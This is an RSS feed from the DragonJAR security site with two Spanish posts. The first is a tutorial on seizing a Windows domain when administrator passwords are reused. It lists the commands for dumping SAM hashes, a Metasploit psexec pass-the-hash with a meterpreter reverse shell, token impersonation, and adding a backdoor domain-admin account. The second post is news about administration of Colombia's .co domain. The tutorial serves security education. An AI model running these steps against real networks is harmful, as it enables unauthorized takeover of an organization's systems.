<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>La Comunidad DragonJAR &#187; Dominios</title> <atom:link href="http://www.dragonjar.org/tag/dominios/feed" rel="self" type="application/rss+xml" /><link>http://www.dragonjar.org</link> <description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description> <lastBuildDate>Sat, 11 Feb 2012 22:13:24 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <item><title>¿Cómo tomar control de un Dominio en Windows?</title><link>http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml</link> <comments>http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml#comments</comments> <pubDate>Wed, 17 Feb 2010 20:07:39 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[Administrador]]></category> <category><![CDATA[BackTrack]]></category> <category><![CDATA[Contraseñas]]></category> <category><![CDATA[Dominios]]></category> <category><![CDATA[Metasploit]]></category> <category><![CDATA[meterpreter]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[Windows]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3886</guid> <description><![CDATA[Los &#8220;dominios&#8221; en windows, facilitan muchas de las tareas a la hora de administrar una red, ya que permite realizar una agrupación lógica de servidores de red y otros ordenadores, para compartir  información común sobre cuentas  y seguridad, pero es una practica muy común (aunque poco recomendada) que los administradores de estos dominios reutilicen la [...]]]></description> <content:encoded><![CDATA[<p>Los &#8220;<a
href="http://www.dragonjar.org/tag/dominios" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Dominios">dominios</a>&#8221; en <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">windows</a>, facilitan muchas de las tareas a la hora de administrar una red, ya que permite realizar     una agrupación lógica de servidores de red y otros ordenadores, para compartir  información común sobre cuentas  y <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a>, pero es una practica muy común (aunque poco recomendada) que los administradores de estos dominios reutilicen la clave que usan para el usuario <a
href="http://www.dragonjar.org/tag/administrador" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Administrador">administrador</a> de un equipo en los dominios de <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">windows</a>.</p><p
style="text-align: center;"><img
class="alignnone" title="hackear dominio en windows" src="http://img517.imageshack.us/img517/3070/dominio.jpg" alt="dominio ¿Cómo tomar control de un Dominio en Windows?" width="502" height="425" /></p><p>En el siguiente video vamos a ver como  tomar el control de un dominio en windows, cuando se presenta el caso de Reutilización de <a
href="http://www.dragonjar.org/tag/contrasenas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Contraseñas">contraseñas</a> comentado anteriormente:<span
id="more-3886"></span></p><p>REQUISITOS</p><ul><li>Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario)</li><li>Todos los usuarios &#8220;administrador&#8221; de las maquinas miembros del dominio tienen la misma clave</li><li>Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social)</li><li>Una copia de <a
href="../http://www.dragonjar.org/backtrack-4-final.xhtml">BackTrack 4</a></li></ul><p>Teniendo los requisitos listo, pasamos a realizar los pasos para tomar el control de un dominio en Windows:</p><p
style="text-align: center;"><object
classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param
name="allowFullScreen" value="true" /><param
name="allowScriptAccess" value="always" /><param
name="src" value="http://www.youtube.com/v/fIQQD193Hvc&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" /><param
name="allowfullscreen" value="true" /><embed
type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/fIQQD193Hvc&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p><p>Como vemos, fácilmente hemos agregado un usuario administrador a la lista de &#8220;administradores de dominio&#8221; simplemente siguiendo estos pasos:</p><ul><li><strong>mount /dev/sda1 /mnt/sda1</strong><br
/> Montamos la particion de la maquina windows</li><li><strong>cd /mnt/sda1/WINDOWS/system32/config</strong><br
/> accedemos a la carpeta dodne se encuentra el archivo SAM</li><li><strong>samdump2 system SAM</strong><br
/> sacamos los hash de los usuarios en la maquina windows</li><li><strong>msfconsole</strong><br
/> ejecutamos el <a
href="http://www.dragonjar.org/tag/metasploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Metasploit">metasploit</a> por consola</li><li><strong>use windows/smb/psexec</strong><br
/> utilizamos el psexec</li><li><strong>exploit -p windows/<a
href="http://www.dragonjar.org/tag/meterpreter" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con meterpreter">meterpreter</a>/reverse_tcp -o</strong><br
/> utilizamos la shell meterpreter</li><li><strong>LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass=  123&#8230;:5654&#8230; -j</strong><br
/> configuramos las opciones del exploit</li><li><strong>sessions -i 1</strong><br
/> una vez aparezca exitoso el ataque lanzamos la sesión donde se encuentra</li><li><strong>use incognito</strong><br
/> utilizamos el modulo incognito de meterpreter</li><li><strong>list_tokens -u</strong><br
/> mostramos los tokens</li><li><strong>impersonate_token mydomain\\domainadmin</strong><br
/> tomamos las credenciales del administrador de dominio</li><li><strong>execute -f cmd.exe -i -t</strong><br
/> lanzamos la consola de windows</li><li><strong>net user hack MPass5678 /add /domain</strong><br
/> Agregamos el usuario &#8220;hack&#8221; con clave &#8220;MPass46782&#8243; al dominio</li><li><strong>net group &#8220;Domain Admins&#8221; hack /add /domain</strong><br
/> metemos el usuario hack al grupo de administradores de dominio</li><li>Ya hemos tomado el control del dominio de windows</li></ul><p>Este ataque es compatible con  WinXP/Vista/Win7/Windows Server2k3/Windows  Server 2k7 y muestra lo sensible que es reutilizar las contraseñas en nuestro sistema, sin importar que tan &#8220;complejas&#8221; sean.</p><p>PD. en <a
href="http://securitytube.net/How-to-own-a-Windows-Domain-video.aspx">Securitytube.net existe un vídeo en el que realizan este mismo procedimiento</a> un poco mas &#8220;a mano&#8221; pero que puede servirnos también en nuestro proceso de aprendizaje.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/multiples-distribuciones-de-seguridad-en-tu-usb-con-katana.xhtml" title="Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB">Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB</a></li><li><a
href="http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml" title="Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida">Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</a></li><li><a
href="http://www.dragonjar.org/katana-multiples-distribuciones-de-seguridad-en-tu-usb.xhtml" title="Katana &#8211; Múltiples Distribuciones de Seguridad en tu USB">Katana &#8211; Múltiples Distribuciones de Seguridad en tu USB</a></li><li><a
href="http://www.dragonjar.org/manual-de-metasploit-framework.xhtml" title="Curso Completo de Metasploit Framework">Curso Completo de Metasploit Framework</a></li><li><a
href="http://www.dragonjar.org/winautopwn-ataques-automaticos-de-entornos-windows.xhtml" title="winAUTOPWN &#8211; Ataques automáticos de entornos Windows">winAUTOPWN &#8211; Ataques automáticos de entornos Windows</a></li><li><a
href="http://www.dragonjar.org/asi-fue-el-hacking-day-en-medellin-pentesting-con-backtrack.xhtml" title="Así fue el Hacking Day en Medellín &#8211; Pentesting con Backtrack">Así fue el Hacking Day en Medellín &#8211; Pentesting con Backtrack</a></li><li><a
href="http://www.dragonjar.org/como-funcionan-y-se-crackean-las-claves-en-sistemas-windows.xhtml" title="Cómo funcionan y se crackean las claves en sistemas Windows">Cómo funcionan y se crackean las claves en sistemas Windows</a></li><li><a
href="http://www.dragonjar.org/backtrack-5.xhtml" title="BackTrack 5">BackTrack 5</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml/feed</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>Ministerio de Colombia aprueba modelo para la administración de dominio.co</title><link>http://www.dragonjar.org/mincomunicaciones-de-colombia-decidio-sobre-el-modelo-para-la-administracion-del-dominioco.xhtml</link> <comments>http://www.dragonjar.org/mincomunicaciones-de-colombia-decidio-sobre-el-modelo-para-la-administracion-del-dominioco.xhtml#comments</comments> <pubDate>Sat, 26 Jan 2008 00:09:38 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Legislación y Ética]]></category> <category><![CDATA[.co]]></category> <category><![CDATA[Colombia]]></category> <category><![CDATA[Dominios]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=464</guid> <description><![CDATA[El Ministerio de Comunicaciones tomó la decisión sobre el modelo operativo que aplicará para la administración del dominio.co. Se mantendrá la política en cabeza del Ministerio y se tercerizará mediante un proceso de selección objetiva la administración. Las empresas que resulten seleccionadas, después del proceso licitatorio correspondiente, tendrán como responsabilidad administrar los registros existentes, mantener [...]]]></description> <content:encoded><![CDATA[<p><strong>El Ministerio de Comunicaciones</strong> tomó la decisión sobre el <em>modelo operativo que aplicará para la administración del dominio.co.</em> Se mantendrá la política en cabeza del Ministerio y se tercerizará mediante un proceso de selección objetiva la administración.</p><p>Las empresas que resulten seleccionadas, después del proceso licitatorio correspondiente, tendrán como responsabilidad administrar los registros existentes, mantener la base de datos maestra y permitir la publicación en Internet de los <em><span
style="text-decoration: underline;">nuevos <a
href="http://www.dragonjar.org/tag/dominios" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Dominios">dominios</a>.</span></em></p><p
align="center"><img
src="http://img170.imageshack.us/img170/2834/co1pa4.jpg" alt="co1pa4 Ministerio de Colombia aprueba modelo para la administración de dominio.co"  title="Ministerio de Colombia aprueba modelo para la administración de dominio.co" /><span
id="more-464"></span></p><p>También se decidió que para preservar la transparencia de los usuarios, garantizando la continuidad de los registros existentes y siendo congruente con las directrices que sobre la materia se tienen a nivel nacional e internacional, el Ministerio creará un Consejo Asesor que tendrá por objeto asesorar en la fijación de las políticas necesarias para el desarrollo, promoción y fortalecimiento del <strong>nombre de dominio</strong> de Internet bajo el código de país correspondiente a <a
href="http://www.dragonjar.org/tag/colombia" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Colombia">Colombia</a> <a
href="http://www.dragonjar.org/tag/co" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con .co">.co</a>.</p><p>El Consejo Asesor estará integrado por los Ministerios de Comunicaciones, Industria y Comercio, y de Interior y Justicia, la Universidad de Los Andes, un delegado de los profesores universitarios y un empresario seleccionados por la Ministra de Comunicaciones.</p><p>También se contratará una firma auditora para que realice el seguimiento y control de cada uno de los permisos de registro de <em>dominio</em> otorgados, de acuerdo con las políticas adoptadas.</p><p>Según lo informó el Ministerio, se mantendrán los registros de segundo nivel (.com.co, .edu.co, gov.co, etc) y se examinará la posibilidad de otorgar registros de primer nivel (.co), que identifiquen a Colombia.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/respuesta-juridica-frente-ataques-informaticos.xhtml" title="Respuesta jurídica frente ataques informáticos">Respuesta jurídica frente ataques informáticos</a></li><li><a
href="http://www.dragonjar.org/talleres-de-matias-katz-en-el-ack-security-conference.xhtml" title="Talleres de Matias Katz en el ACK Security Conference">Talleres de Matias Katz en el ACK Security Conference</a></li><li><a
href="http://www.dragonjar.org/taller-de-carlos-mario-penagos-en-el-ack-security-conference.xhtml" title="Taller de Carlos Mario Penagos en el ACK Security Conference">Taller de Carlos Mario Penagos en el ACK Security Conference</a></li><li><a
href="http://www.dragonjar.org/taller-de-lorenzo-martinez-en-el-ack-security-conference.xhtml" title="Taller de Lorenzo Martinez en el ACK Security Conference">Taller de Lorenzo Martinez en el ACK Security Conference</a></li><li><a
href="http://www.dragonjar.org/taller-de-leonardo-pigner-en-el-ack-security-conference.xhtml" title="Taller de Leonardo Pigñer en el ACK Security Conference">Taller de Leonardo Pigñer en el ACK Security Conference</a></li><li><a
href="http://www.dragonjar.org/taller-de-deviant-ollam-en-el-ack-security-conference.xhtml" title="Taller de Deviant Ollam en el ACK Security Conference">Taller de Deviant Ollam en el ACK Security Conference</a></li><li><a
href="http://www.dragonjar.org/call-for-papers-abierto-para-el-ack-security-conference.xhtml" title="Call for Papers abierto para el ACK Security Conference">Call for Papers abierto para el ACK Security Conference</a></li><li><a
href="http://www.dragonjar.org/ack-securityconference.xhtml" title="ACK Security Conference">ACK Security Conference</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/mincomunicaciones-de-colombia-decidio-sobre-el-modelo-para-la-administracion-del-dominioco.xhtml/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 8/33 queries in 0.088 seconds using disk: basic
Object Caching 875/906 objects using disk: basic

Served from: www.dragonjar.org @ 2012-02-11 20:12:24 -->
